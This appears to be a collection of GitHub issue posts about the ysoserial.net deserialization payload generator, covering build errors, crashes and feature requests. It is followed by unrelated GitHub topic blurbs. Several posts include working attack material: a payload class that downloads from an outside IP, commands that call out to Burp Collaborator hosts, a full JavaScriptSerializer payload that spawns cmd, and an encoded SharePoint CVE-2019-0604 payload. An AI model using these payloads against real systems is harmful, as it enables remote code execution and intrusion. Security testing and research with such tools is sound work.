--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Rethrow(ActionExecutedContextSealed context)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeInnerFilterAsync()
--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeFilterPipelineAsync>g__Awaited|19_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeAsync>g__Logged|17_1(ResourceInvoker invoker)
at Microsoft.AspNetCore.Routing.EndpointMiddleware.<Invoke>g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger)
at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context)
Many dependencies of this project are now long longer supported, have been removed from NuGet for the version specified, or contain security issues in the version used. It would likely be a good idea to go a run through of all of the dependencies and update the project to use more modern versions where applicable or find suitable replacements where the project is no longer maintained.
The latest release (31) is missing half of the required DLLs so the program just crashed when you try and run it. Finally realised this after looking at a previous release and finding it had a few more DLLs in.
Hello, I download the master-Release-26
Unzip it and the chmod +x ysoserial.exe
But get the error
Unhandled Exception: System.Reflection.ReflectionTypeLoadException: Exception of type 'System.Reflection.ReflectionTypeLoadException' was thrown. Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. at (wrapper managed-to-native) System.Reflection.Assembly.GetTypes(System.Reflection.Assembly,bool) at System.Reflection.Assembly.GetTypes () [0x00000] in <d0e12f672b88444ab4b6d9b2ecf20142>:0 at ysoserial.Program+<>c.<Main>b__11_0 (System.Reflection.Assembly s) [0x00000] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0 at System.Linq.Enumerable+SelectManySingleSelectorIterator
2[TSource,TResult].MoveNext () [0x0005f] in <13c0993ff82548209b09f271bd5e6a78>:0
at System.Linq.Enumerable+WhereSelectEnumerableIterator2[TSource,TResult].ToList () [0x00041] in <13c0993ff82548209b09f271bd5e6a78>:0 at System.Linq.Enumerable.ToList[TSource] (System.Collections.Generic.IEnumerable
1[T] source) [0x00021] in <13c0993ff82548209b09f271bd5e6a78>:0
at ysoserial.Program.Main (System.String[] args) [0x00132] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0
System.IO.FileNotFoundException: Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
File name: 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
[ERROR] FATAL UNHANDLED EXCEPTION: System.Reflection.ReflectionTypeLoadException: Exception of type 'System.Reflection.ReflectionTypeLoadException' was thrown.
Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
at (wrapper managed-to-native) System.Reflection.Assembly.GetTypes(System.Reflection.Assembly,bool)
at System.Reflection.Assembly.GetTypes () [0x00000] in :0
at ysoserial.Program+<>c.
2[TSource,TResult].MoveNext () [0x0005f] in <13c0993ff82548209b09f271bd5e6a78>:0 at System.Linq.Enumerable+WhereSelectEnumerableIterator
2[TSource,TResult].ToList () [0x00041] in <13c0993ff82548209b09f271bd5e6a78>:01[T] source) [0x00021] in <13c0993ff82548209b09f271bd5e6a78>:0 at ysoserial.Program.Main (System.String[] args) [0x00132] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0 System.IO.FileNotFoundException: Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. File name: 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
uname -a
5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
(Ideally I'd start a discussion for this, but I don't believe that's enabled for this repository.)
Currently Ysoserial.NET primarily works to support generation of gadget payloads that execute a command on deserialization. There are some exceptions to this rule as some gadgets allow you to specify files and there is a plugin option to handle special cases for specific technologies.
I've been doing quite a lot of research recently into different types of gadgets that would allow a researcher to generate payloads that can perform other useful actions, such as exfiltrating files via XXE gadget chains during deserialization. I've even got a PoC that works on .NET Core and .NET 7, utilizing the serializer to bypass the default XML parsing security configurations introduced in .NET 4.5.2.
I believe there is probably some interest in being able to generate these, but I'm not sure what the consensus would be on how to approach it with respect to listing the gadgets and avoiding cluttering the command line options.
Do you have instructions on how to build the exe in linux?
This plugin -h mentioned mode upload_file, but what actually used is write_file
{"m|mode=", "the payload mode: read_file, upload_file, run_command.", v => mode = v },
if (mode == "write_file" && path != "" & url != "")
This tool could be really awesome if it will be integrated into Zap - using it to attack/tests web app will be a lot easier. I've opened an issue (zaproxy/zaproxy#4112) - so feel free to join the discussion...
There is a bug in Calculate7BitEncodedInt that does not support large data. This can cause issue when minifying BinaryFormatter/LosFormatter payloads.
The affected function needs to be rewritten based on https://referencesource.microsoft.com/#mscorlib/system/io/binarywriter.cs,2daa1d14ff1877bd,references
I test debugging ysoserial.net source code with options -f BinaryFormatter -o base64 -c 'calc' -g WindowsClaimsIdentity --test
to see if the gadget works.
I always get this error: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.Serialization.SerializationException: ID4282: There was an error deserializing a new 'WindowsClaimsIdentity' instance. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidCastException: Unable to cast object of type 'System.Windows.Data.ObjectDataProvider' to type 'System.Windows.Media.Brush'
To be sure, I have cleaned and rebuilt the project before each run:
However, when I run the built file source\ysoserial\bin\Debug\ysoserial.exe
then it works!?
So What does this error means? and Why deserializing when debug project raise the error?
Hello,
I definitely have situation where an app i am assessing is allowing __type declaration but no matter what i attempt with payloads i get the same response if i include any value for __type. Not looking for help exploiting this for my assessment, just some direction. All of the research I've done is showing this should be exploitable. Kind of want to know what the next step could be in discovery of whether or not this is exploitable but i hit a wall on the __type null problem. MVC 3
I have used Freddy which is certain there is a problem here.
ysoserial.exe -c "nslookup SCRUBBED.burpcollaborator.net" -g ObjectDataProvider -f JavaScriptSerializer
And I'm sending this payload to the target and can't get anything to run, it's a windows box.
Payload that does the detection looks like (or similar) - I can insert null and then i get an error message saying it wants a true or false for another parameter, which I've also tried appending but s till get the error about type not being null.
{"__type":""}
Error looks like this:
`HTTP/1.1 500 Internal Server Error
Date: Mon, 20 Apr 2020 15:49:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9702
Connection: close
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, HEAD
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
|
|
The XLST in the XMLMinifier is removing needed variables for the datacontractserializer formatter when using the WindowsPrinciple gadget.
This is a reminder for @irsdl to patch the XSLT to give the option of removing the variables or not and/or only remove the variables if not in use.
Hello!
Viewstate, generate a payload encrypted as AES and 3DES, and the test cannot be deserialized. The query data is (if the signature algorithm is aes/3des, no matter whether the encryption function is enabled or not, we just need to sign the data first, encrypt it again, and then sign it again as mentioned earlier. Then send it to the server, asp.net enters getdecodeddata(), and then encryptordecryptdata() first for verification and decryption, and then verify it again after coming out.), How to solve this problem? There are also lower versions of V2 Net2.0viewstate deserialization how should I use the chain?
Attempted code
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="AES" --validationkey="xxxxxxxxxx"
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="3DES" --validationkey="xxxxxxxxxx"
Hello there,
I'm hoping you can help me out. As noted in the title, this is likely just me not understanding the tool well enough. I'm trying to use the ActivitySurrogateSelectorFromFile
formatter, with the ObjectStateFormatter
gadget. As noted in the readme, I've provided the .cs
file as well as the additional assemblies required.
I am using a modified ExploitClass.cs that does the following:
using System;
//using System.Windows.Forms;
using System.Net;
using System.IO;
namespace ysoserial
{
class ExploitClass
{
public ExploitClass()
{
try
{
// Payload code to be executed
//MessageBox.Show("Pwned", "Pwned", MessageBoxButtons.OK, MessageBoxIcon.Error);
WebClient Client = new WebClient();
Client.DownloadFile("http://123.123.123.123:9000", Path.GetTempPath()+"\\pwnd.txt");
}
catch (Exception)
{
}
}
}
}
After building the project, and trying to execute it from the .\bin\Debug\
folder I got this error:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug\ExploitClass.cs'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.CSharp.CSharpCodeGenerator.System.CodeDom.Compiler.ICodeCompiler.CompileAssemblyFromFileBatch(CompilerParameters options, String[] fileNames)
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile(CompilerParameters options, String[] fileNames)
at ysoserial.Generators.PayloadClassFromFile..ctor(String file) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 23
at ysoserial.Generators.ActivitySurrogateSelectorFromFileGenerator.Generate(String file, String formatter, Boolean test) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 48
at ysoserial.Program.Main(String[] args) in C:\workspace\bb\ysoserial.net\ysoserial\Program.cs:line 117
Which tells me it (of course) couldn't find ExploitClass.cs
in the folder. At first I tried just copying my modified ExploitClass.cs
into .\bin\Debug\
, but that didn't seem to work:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Metadata file 'System.Net' could not be found
Metadata file 'System.IO' could not be found
I also tried copying the compiled ysoserial.exe
into the main project folder and executing from there:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>copy ysoserial.exe ..\..\ysoserial.exe
1 file(s) copied.
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>cd ..\..\
C:\workspace\bb\ysoserial.net\ysoserial>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'NDesk.Options, Version=0.2.1.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
at ysoserial.Program.Main(String[] args)
Any ideas?
Hi,
When command contains &
character, the ysoserial.net will generate broken payload.
I used the following command:
ysoserial --cve=CVE-2019-0604 --command="dir && nslookup xst82rx7czaogsnnk8tuq6gpzg56tv.burpcollaborator.net" -p SharePoint
__bp837135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c20035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a3001600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a3002600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300c3005400870007001600e6004600560046005400c6005600d6005600e6004700f200e300c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300c300d400560047008600f60046000500160027001600d60056004700560027003700e300c3001600e6009700450097000700560002001600a3004700970007005600d30022002600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600620017005700f6004700b30002008700d600c600e6003700a3008700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600620017005700f6004700b30002008700d600c600e6003700a3003600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600620017005700f6004700b30002008700d600c600e6003700a3004600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d600620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d300620017005700f6004700b300620017005700f6004700b3000200f4002600a6005600360047004500970007005600d300620017005700f6004700b300b7008700a300450097000700560002004600a30005002700f6003600560037003700d700620017005700f6004700b3000200d400560047008600f6004600e4001600d6005600d300620017005700f6004700b30035004700160027004700620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b300f200360002004600960027000200620062000200e6003700c600f600f600b600570007000200870037004700830023002700870073003600a7001600f60076003700e600e600b6008300470057001700630076000700a70076005300630047006700e20026005700270007003600f600c600c60016002600f600270016004700f6002700e200e600560047006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b30002006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300c300f2001600e60097004500970007005600e300c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300c300f4002600a6005600360047009400e600370047001600e6003600560002001600a3004700970007005600d300220085001600d600c6002500560016004600560027002200e300c300f200f4002600a6005600360047009400e600370047001600e60036005600e300c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300
The payload won't execute on a vulnerable SharePoint. However, if I try nslookup without the &&
the payload will execute.
Hi there,
I have this valid json request
{"IsSafeSearchEnabled":true,"IsSearchMonitorEnabled":true,"IsGoogleHttpsRedirectEnabled":false,"ExcludedEntities":[{"EntityType":0,"Name":"test"}]}
for executing the RCE I used this command
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c calc'
}
}
}
but getting this error, could you say what I did wrong?
[ArgumentNullException: Value cannot be null. Name of parameter: type]
System.Activator.CreateInstance(Type type, Boolean nonPublic) +11110602
System.Activator.CreateInstance(Type type) +66
System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +418
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +66
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +145
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +201
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer) +78
System.Web.Script.Serialization.JavaScriptSerializer.Deserialize(JavaScriptSerializer serializer, String input, Type type, Int32 depthLimit) +44
System.Web.Mvc.JsonValueProviderFactory.GetDeserializedObject(ControllerContext controllerContext) +210
System.Web.Mvc.JsonValueProviderFactory.GetValueProvider(ControllerContext controllerContext) +16
System.Web.Mvc.<>c__DisplayClassc.<GetValueProvider>b__7(ValueProviderFactory factory) +34
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +157
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +183
System.Collections.Generic.List`1..ctor(IEnumerable`1 collection) +460
System.Linq.Enumerable.ToList(IEnumerable`1 source) +58
System.Web.Mvc.ValueProviderFactoryCollection.GetValueProvider(ControllerContext controllerContext) +260
System.Web.Mvc.ControllerBase.get_ValueProvider() +25
System.Web.Mvc.ControllerActionInvoker.GetParameterValue(ControllerContext controllerContext, ParameterDescriptor parameterDescriptor) +62
System.Web.Mvc.ControllerActionInvoker.GetParameterValues(ControllerContext controllerContext, ActionDescriptor actionDescriptor) +105
System.Web.Mvc.Async.<>c__DisplayClass25.<BeginInvokeAction>b__1e(AsyncCallback asyncCallback, Object asyncState) +445
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Async.AsyncControllerActionInvoker.BeginInvokeAction(ControllerContext controllerContext, String actionName, AsyncCallback callback, Object state) +302
System.Web.Mvc.<>c__DisplayClass1d.<BeginExecuteCore>b__17(AsyncCallback asyncCallback, Object asyncState) +30
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecuteCore(AsyncCallback callback, Object state) +338
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +316
System.Web.Mvc.Controller.System.Web.Mvc.Async.IAsyncController.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +15
System.Web.Mvc.<>c__DisplayClass8.<BeginProcessRequest>b__2(AsyncCallback asyncCallback, Object asyncState) +71
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContextBase httpContext, AsyncCallback callback, Object state) +251
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContext httpContext, AsyncCallback callback, Object state) +48
System.Web.Mvc.MvcHandler.System.Web.IHttpAsyncHandler.BeginProcessRequest(HttpContext context, AsyncCallback cb, Object extraData) +16
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +301
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +155
at the server deserialize code like this
JavaScriptSerializer jsonSerializer = new JavaScriptSerializer();
System.Collections.Generic.Dictionary<string, string> data = jsonSerializer.Deserialize<System.Collections.Generic.Dictionary<string, string>>(requestBody);
thank you
Please am trying to build the v2 branch for an old asp.net server i came across.
Please help with guide on how to build.
Powershell on Debian Linux
Unhandled Exception:
System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
I see README.md apply:
RolePrincipal
DataSet
ClaimsIdentity
but i run "ysoserial.exe -h", did not show above gaget, so i need some help. thank you.
I've noticed that the class here is not referenced inside the VS Project. I tried to import and when compiling it give me errors:
error CS0117: 'Comparer' does not contain a definition for 'Create'
error CS0246: The type or namespace name 'SortedSet<>' could not be found (are you missing a using directive or an assembly reference?)
I've noticed that the class SortedSet is not present into .NET 2.0 and neither does Comparer.Create
Since this gadget should be smaller than ActivitySurrogateSelector, I'd like to compile and use it.
Is this class left outside the project on purpose? Is there a way to compile it and use on .NET 2.0 targets?
there is no file present ysoserial.exe
on this tool i didnt get this file any where how can i run this tool
Precompiled or Build Dependency guide
Hey all, 2 questions really
is there a binary ?
I've installed visual studio 2019, while I could list the dependencies it's erroring on during build phase I have to ask, is there a dependency/build guide that I've ignored/overlooked ?
I've been working on implementing an insecure deserialization plugin for w3af https://github.com/andresriancho/w3af/blob/feature/deserialization/w3af/plugins/audit/deserialization.py . For now it is working with python, nodejs and java.
I'm trying to use ysoserial.net to generate the payloads which would be sent during an application scan. Something that worries me is the large number of payloads which can be generated using ysoserial.net
A dummy approach would be to generate all the possible payloads using all (gadget, formatter) combinations and send them all. That would (potentially) yield the highest test coverage, but will also take more time to send all the HTTP requests.
In order to reduce the number of HTTP requests to be sent I would like to understand:
(Gadget: ObjectDataProvider, Formatter: Json.net)
work, and (Gadget: WindowsIdentity, Formatter: Json.net)
not?I'm sending the payloads to all parameters, sending them as-is and base64 encoded, sending them in query string, post-data, cookies.
Any other pointers on writing a black-box scanner for insecure .net deserialization?
This issue is related with #6
Can you upload some binary releases and preferably targeting .NET 2.X ?
Are there any gadgets out there for Mono? I'd be willing to implement them but I can't find any research into attacking deserialization on Mono, or Unity for that matter. Target platform is Windows.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.